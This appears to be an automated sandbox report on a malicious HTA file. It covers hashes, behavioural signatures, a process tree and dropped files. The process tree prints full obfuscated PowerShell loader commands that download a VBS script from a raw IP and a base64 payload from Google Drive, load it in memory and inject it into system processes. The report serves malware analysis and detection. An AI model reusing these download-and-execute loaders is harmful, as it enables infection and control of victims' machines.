Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-10-2024 12:37
Static task
static1
Behavioral task
behavioral1
Sample
greatevenevermadeforrgreatthignstogetinbacketothegreat.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
greatevenevermadeforrgreatthignstogetinbacketothegreat.hta
Resource
win10v2004-20241007-en
General
-
Target
greatevenevermadeforrgreatthignstogetinbacketothegreat.hta
-
Size
131KB
-
MD5
b39c3f8b9214a7a097b0e0c92d6bc193
-
SHA1
7b253873758021db1fa779229091683bc3b7288c
-
SHA256
c1a88da841596f0f34b25bd9c04a36a2d8134bf9955b46f2185c331182d3b8eb
-
SHA512
ea17056a19ae47f4317aad55a971015d48e4e986c6c1bfa0490afdea1045fc4655a6a049ebc0a89ce0fd92029c8dd9cfe973c2c7608c54b79e626657baaa90b7
-
SSDEEP
48:4vah3d7Ah23jX+Iw81OcNw811aoWeGOyMs1n0J6OpyMmRzAbNxx6TVzok1uHlhiA:4vCt73RjkajCjOQVmPizsNqZ1EjIQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 30 IoCs
flow pid Process 24 3020 poWErshElL.exe 27 4848 powershell.exe 31 4848 powershell.exe 37 4848 powershell.exe 52 2332 mshta.exe 58 2332 mshta.exe 63 2332 mshta.exe 64 2332 mshta.exe 65 2332 mshta.exe 66 2332 mshta.exe 68 2332 mshta.exe 70 2332 mshta.exe 71 2332 mshta.exe 77 2332 mshta.exe 79 2332 mshta.exe 92 2332 mshta.exe 95 2332 mshta.exe 96 2332 mshta.exe 97 2332 mshta.exe 98 2332 mshta.exe 100 2332 mshta.exe 102 2332 mshta.exe 103 2332 mshta.exe 104 2332 mshta.exe 105 2332 mshta.exe 107 2332 mshta.exe 108 2332 mshta.exe 109 2332 mshta.exe 110 2332 mshta.exe 111 2332 mshta.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 888 powershell.exe 4848 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3020 poWErshElL.exe 1048 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 drive.google.com 27 drive.google.com -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4848 set thread context of 2884 4848 powershell.exe 107 PID 2884 set thread context of 2332 2884 aspnet_regbrowsers.exe 83 PID 2884 set thread context of 404 2884 aspnet_regbrowsers.exe 110 PID 404 set thread context of 2332 404 setupugc.exe 83 PID 404 set thread context of 4960 404 setupugc.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setupugc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWErshElL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \Registry\User\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 setupugc.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings poWErshElL.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 3020 poWErshElL.exe 3020 poWErshElL.exe 1048 powershell.exe 1048 powershell.exe 888 powershell.exe 888 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 2884 aspnet_regbrowsers.exe 2884 aspnet_regbrowsers.exe 2884 aspnet_regbrowsers.exe 2884 aspnet_regbrowsers.exe 2884 aspnet_regbrowsers.exe 2884 aspnet_regbrowsers.exe 2884 aspnet_regbrowsers.exe 2884 aspnet_regbrowsers.exe 404 setupugc.exe 404 setupugc.exe 404 setupugc.exe 404 setupugc.exe 404 setupugc.exe 404 setupugc.exe 404 setupugc.exe 404 setupugc.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 2884 aspnet_regbrowsers.exe 2332 mshta.exe 2332 mshta.exe 404 setupugc.exe 404 setupugc.exe 404 setupugc.exe 404 setupugc.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3020 poWErshElL.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 2332 wrote to memory of 3020 2332 mshta.exe 85 PID 2332 wrote to memory of 3020 2332 mshta.exe 85 PID 2332 wrote to memory of 3020 2332 mshta.exe 85 PID 3020 wrote to memory of 1048 3020 poWErshElL.exe 89 PID 3020 wrote to memory of 1048 3020 poWErshElL.exe 89 PID 3020 wrote to memory of 1048 3020 poWErshElL.exe 89 PID 3020 wrote to memory of 676 3020 poWErshElL.exe 94 PID 3020 wrote to memory of 676 3020 poWErshElL.exe 94 PID 3020 wrote to memory of 676 3020 poWErshElL.exe 94 PID 676 wrote to memory of 400 676 csc.exe 95 PID 676 wrote to memory of 400 676 csc.exe 95 PID 676 wrote to memory of 400 676 csc.exe 95 PID 3020 wrote to memory of 4536 3020 poWErshElL.exe 97 PID 3020 wrote to memory of 4536 3020 poWErshElL.exe 97 PID 3020 wrote to memory of 4536 3020 poWErshElL.exe 97 PID 4536 wrote to memory of 888 4536 WScript.exe 98 PID 4536 wrote to memory of 888 4536 WScript.exe 98 PID 4536 wrote to memory of 888 4536 WScript.exe 98 PID 888 wrote to memory of 4848 888 powershell.exe 100 PID 888 wrote to memory of 4848 888 powershell.exe 100 PID 888 wrote to memory of 4848 888 powershell.exe 100 PID 4848 wrote to memory of 3932 4848 powershell.exe 103 PID 4848 wrote to memory of 3932 4848 powershell.exe 103 PID 4848 wrote to memory of 3932 4848 powershell.exe 103 PID 4848 wrote to memory of 412 4848 powershell.exe 104 PID 4848 wrote to memory of 412 4848 powershell.exe 104 PID 4848 wrote to memory of 412 4848 powershell.exe 104 PID 4848 wrote to memory of 3736 4848 powershell.exe 105 PID 4848 wrote to memory of 3736 4848 powershell.exe 105 PID 4848 wrote to memory of 3736 4848 powershell.exe 105 PID 4848 wrote to memory of 4344 4848 powershell.exe 106 PID 4848 wrote to memory of 4344 4848 powershell.exe 106 PID 4848 wrote to memory of 4344 4848 powershell.exe 106 PID 4848 wrote to memory of 2884 4848 powershell.exe 107 PID 4848 wrote to memory of 2884 4848 powershell.exe 107 PID 4848 wrote to memory of 2884 4848 powershell.exe 107 PID 4848 wrote to memory of 2884 4848 powershell.exe 107 PID 4848 wrote to memory of 2884 4848 powershell.exe 107 PID 4848 wrote to memory of 2884 4848 powershell.exe 107 PID 2332 wrote to memory of 404 2332 mshta.exe 110 PID 2332 wrote to memory of 404 2332 mshta.exe 110 PID 2332 wrote to memory of 404 2332 mshta.exe 110 PID 404 wrote to memory of 4960 404 setupugc.exe 112 PID 404 wrote to memory of 4960 404 setupugc.exe 112
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatevenevermadeforrgreatthignstogetinbacketothegreat.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\WINDOWSPOWERsheLL\V1.0\poWErshElL.exe"C:\Windows\sYstEm32\WINDOWSPOWERsheLL\V1.0\poWErshElL.exe" "poWersheLL.exe -ex bypass -nop -W 1 -C DEvICecreDENTIalDEpLoYMEnT.eXE ; iEx($(IEX('[sYsteM.TeXt.EnCodInG]'+[cHAr]58+[char]0x3A+'utf8.geTSTring([SySTEM.CoNvert]'+[chaR]0X3a+[CHAR]0X3a+'FrombaSE64sTRING('+[CHAR]34+'JDNQWGFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFUmRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhEdXd3YU1ILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicHBCayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTmFtV2pmLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUpISGlCdkpzc1gsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIndPY1JwcWtrWW8iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUU8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkM1BYYU86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly83OS4xNDEuMTY0LjIxNC80NDUvZ3JlZW50aGluZ3N0b2JlZ3JlYXR0aGluZ3Nmb3JlbnRpcmVwdXJwb3NlZm9yZ3JlYXQudElGIiwiJGVuVjpBUFBEQVRBXGdyZWVudGhpbmdzdG9iZWdyZWF0dGhpbmdzZm9yZW50aXJlcHVycG9zZS52YlMiLDAsMCk7c3RBUnQtc0xlZXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVlbnRoaW5nc3RvYmVncmVhdHRoaW5nc2ZvcmVudGlyZXB1cnBvc2UudmJTIg=='+[cHaR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop -W 1 -C DEvICecreDENTIalDEpLoYMEnT.eXE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dbgumpgb\dbgumpgb.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC63E.tmp" "c:\Users\Admin\AppData\Local\Temp\dbgumpgb\CSC8C9218FE4C942D698A8E2E78F0B62C.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:400
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greenthingstobegreatthingsforentirepurpose.vbS"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnS0NCaW0nKydhZ2VVcmwgPSBITjVodHRwczovJysnL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0JysnPScrJ2Rvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHMnKydVT3libkgtc0R2VWhCWXd1JysnciBITjU7S0MnKydCd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uJysnTmV0LldlYkNsaWVudDtLQ0JpbWFnZUJ5dGVzID0gS0NCd2ViQ2xpZW50LkRvd25sJysnb2FkRGF0YShLQ0JpbWFnZVVyJysnbCk7S0NCaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoS0NCaW1hZ2VCeXRlcyk7S0NCc3RhcnRGbGFnID0gSE41JysnPDxCQVNFNjRfU1RBUlQ+PkhONTtLQ0JlbmRGbGFnID0gSE41PDxCJysnQVNFNjRfRU5EPj5ITjU7S0NCc3RhcnRJbmRleCA9IEtDQmltYWdlVGV4dC5JbmRleE9mKEtDQnN0YXJ0RmxhZyk7S0NCZW5kSW5kZXggPSBLQ0JpbScrJ2FnZVRleHQuSW5kZXhPZihLQ0JlbmRGbGFnKTtLQ0JzdGFydEluZGV4IC1nZSAwIC1hbmQgJysnS0NCZW5kSW5kZXggLWd0IEtDQnN0YXJ0SW5kZXg7S0NCc3RhcnRJbmRleCArPSBLQ0JzdGFydEZsYWcuTGVuZ3RoO0snKydDQicrJ2Jhc2U2NExlbmd0aCA9IEtDQmVuZEluZGV4IC0gS0NCc3RhcnRJbmRleDtLQ0JiYXNlNjRDb21tYW5kJysnID0gS0NCaW1hZ2VUZXh0LlN1YnN0cmluZyhLQ0JzdGFydEluZGV4LCBLQ0JiYXNlNjRMZW5ndGgpO0tDQmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKEtDQmJhc2U2NENvbW1hbmQuVG8nKydDaGFyQXJyYXkoKSBPcHogRm9yRWFjaCcrJy1PYmplY3QgeyBLQ0JfICcrJ30pWy0xLi4tKEtDQmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07S0NCY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnInKydvbUJhc2U2NFN0cmluZyhLQ0JiYXNlNjRSZXZlJysncnNlZCk7SycrJ0NCbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEtDQmNvJysnbW1hbmRCeXRlcyk7S0NCdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChITjVWQUlITjUpO0tDQnZhaU1ldGhvZC5JbnZva2UoS0NCbnVsbCwgQChITjV0eHQuUkZGUlNSUy81NDQvJysnNDEyLjQ2MS4xNDEuOTcvLzpwdHRoSE41LCBITjVkZXMnKydhdGl2YWRvSE41LCBITjVkZXNhdGl2YWRvSE41LCBITjVkZXNhdGl2YWRvSE41LCBITjVhc3BuZXRfcmVnYnJvd3NlcnMnKydITjUsIEhONWRlc2F0JysnaXZhZG9ITjUsIEhONWQnKydlc2F0aXZhZG9ITjUsSE4nKyc1ZGVzYXRpdmFkb0hONSxITjVkZXNhdGl2YScrJ2RvSE41LEhOJysnNWQnKydlc2F0aXZhZG8nKydITjUnKycsSE41ZGVzYXRpdmFkb0hONSxITjVkZScrJ3NhdGknKyd2YWRvSE41LEhONTFITjUsSE41ZGVzYXRpdmFkb0hONSkpJysnOycpIC1jckVwbEFjRShbQ0hhUl03MitbQ0hhUl03OCtbQ0hhUl01MyksW0NIYVJdMzkgIC1SRXBMYWNlICAnT3B6JyxbQ0hhUl0xMjQgIC1SRXBMYWNlICAoW0NIYVJdNzUrW0NIYVJdNjcrW0NIYVJdNjYpLFtDSGFSXTM2KXwgJiggJFBzaE9tZVsyMV0rJFBzSG9tRVszNF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('KCBim'+'ageUrl = HN5https:/'+'/drive.google.com/uc?export'+'='+'download&id=1AIVgJJJv1F6vS4s'+'UOybnH-sDvUhBYwu'+'r HN5;KC'+'BwebClient = New-Object System.'+'Net.WebClient;KCBimageBytes = KCBwebClient.Downl'+'oadData(KCBimageUr'+'l);KCBimageText = [System.Text.Encoding]::UTF8.GetString(KCBimageBytes);KCBstartFlag = HN5'+'<<BASE64_START>>HN5;KCBendFlag = HN5<<B'+'ASE64_END>>HN5;KCBstartIndex = KCBimageText.IndexOf(KCBstartFlag);KCBendIndex = KCBim'+'ageText.IndexOf(KCBendFlag);KCBstartIndex -ge 0 -and '+'KCBendIndex -gt KCBstartIndex;KCBstartIndex += KCBstartFlag.Length;K'+'CB'+'base64Length = KCBendIndex - KCBstartIndex;KCBbase64Command'+' = KCBimageText.Substring(KCBstartIndex, KCBbase64Length);KCBbase64Reversed = -join (KCBbase64Command.To'+'CharArray() Opz ForEach'+'-Object { KCB_ '+'})[-1..-(KCBbase64Command.Length)];KCBcommandBytes = [System.Convert]::Fr'+'omBase64String(KCBbase64Reve'+'rsed);K'+'CBloadedAssembly = [System.Reflection.Assembly]::Load(KCBco'+'mmandBytes);KCBvaiMethod = [dnlib.IO.Home].GetMethod(HN5VAIHN5);KCBvaiMethod.Invoke(KCBnull, @(HN5txt.RFFRSRS/544/'+'412.461.141.97//:ptthHN5, HN5des'+'ativadoHN5, HN5desativadoHN5, HN5desativadoHN5, HN5aspnet_regbrowsers'+'HN5, HN5desat'+'ivadoHN5, HN5d'+'esativadoHN5,HN'+'5desativadoHN5,HN5desativa'+'doHN5,HN'+'5d'+'esativado'+'HN5'+',HN5desativadoHN5,HN5de'+'sati'+'vadoHN5,HN51HN5,HN5desativadoHN5))'+';') -crEplAcE([CHaR]72+[CHaR]78+[CHaR]53),[CHaR]39 -REpLace 'Opz',[CHaR]124 -REpLace ([CHaR]75+[CHaR]67+[CHaR]66),[CHaR]36)| &( $PshOme[21]+$PsHomE[34]+'x')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵PID:3932
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵PID:412
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵PID:3736
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵PID:4344
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2884
-
-
-
-
-
-
C:\Windows\SysWOW64\setupugc.exe"C:\Windows\SysWOW64\setupugc.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:4960
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
12KB
MD56f22ce457622e0f30d6b54fd42c0700e
SHA11095fdb63f5a82c2042b424e2bc3b9a01c63e29a
SHA256fcb7735ecd0817cbc3c86db07b5bee1e77679f2a76a3d886f77ae88db56a4381
SHA51245b3c29d3d71520a87677bcfe75c3a00b338f96a3b94af9b191cee72147c679bbe01d52017e2d5067a639422cec067ee193f3f23cc55dbd10759abc5b573a714
-
Filesize
18KB
MD568a54eeb0077a69bf71e0bb1444d07fe
SHA19ed2da8dfa6f0931e42143af069ba2ac9be22808
SHA256bae30626b7203229cd215a21cd2ca88ee9c2ee1677be9dc40b6076f6f460f44f
SHA512fdb1a320c3dc8613d3dfba091f2afbb2b49b2a5fb6c65ba330e1c327e6530ea586960f0fe99280ee49b7077773053a49a9671f443ed8e79c5a7e44fd740b2c21
-
Filesize
1KB
MD532114e12f8905abca69bec20bffbe89b
SHA16709fc0467f107a8bc857cc4d7c48ebd8a9e52ea
SHA2569c3db2213fe9ef87c6424aa11d3c4eaf7a9a6f011352b3ffed0f93c91f622232
SHA512888292b57cbe3a848f8d290d6c3fbb2abb17f4895327e2c2b84be7da7a83f373ab9e45b73793b2e297cc95df52bbcc4b8ac7b88eb7a3249d050f794757c59ec6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5b752f6f1ab720fdc9a3aa237e45d3e81
SHA1a5fe8d5d22ce7e8cc088d9019452b427b558c749
SHA25655d0ffc718e26fa2ab6a43f1de8e1a4a9342733fedcc743349e7e843f715d30b
SHA5122a85b39115b4548827f807c6e87671c0f0c75d141dc07873509a670455fcc7f445bbb55ad5fc4bce4f89a033f7a13d66259a17bd78cb396ea8652749f2dd2d7a
-
Filesize
137KB
MD52aa5b4a9613f66275a8813688d89b143
SHA15298dce042df152dcf126dbdbf987549dd8d49c8
SHA2560fd97f432c3ad570e73d18bcacdf7fabf151ca1f96b72da7f30921f2c3e98df4
SHA5121769a546d97b4cf572378dd8473ac9cedbc96cbb03a6c4dc4d7edf376430fa887e384ef60da77a8f0ff9c0c433ac445acb7f6b963009c2801eb8a3c4df69e6e1
-
Filesize
652B
MD5f4f7a0d4d1ed4a53fe75da5628aa8fea
SHA1ca23fc63498ea2d55ebddd81a9346396fc841a38
SHA2563910fcf7d4706bd6a84935f70008e8fef9ff242cb43e89747563d11cfe106b47
SHA5126b8965b5e711b50680b60c4b88353e95a65efbc755db229b67c01b92d2fb23fa1975644ec693fdea1338d05a290f8fcb095055b05c1be3f54c6d357793ab597d
-
Filesize
468B
MD50f7f0249df5e809b57ba67ada7205248
SHA1cfe8697900ca60bedef3185a1220f102feac901b
SHA2565e35059c497df270a251877e527d0ac3d9a5d1c3e4c779cb407a85ae5ee643e2
SHA5125b4fc02976ba89fbd8ba05fb016bd79694e123d1498ae1a783c7831e33c39dbff81a5302db10f45f160ec73b3a4d82ad0dc869626ab49f5f0d95c3d5c4fbee38
-
Filesize
369B
MD58732673e5a07cd40d028f630f5326618
SHA19896d39f312d17c184d889e16f7e2029bd370292
SHA256f182122624a559c0bf08026d663f3df53011fbe0f4e1d0b60ee8c7c4f7f38236
SHA51257c452035ef0c5c909ee00735f534207e2453fa2dd65de336c6e389c1747857efd406ffb65f26a6513809724f762df28f12f37c6b74e8b91ed7ddc32ea556ebe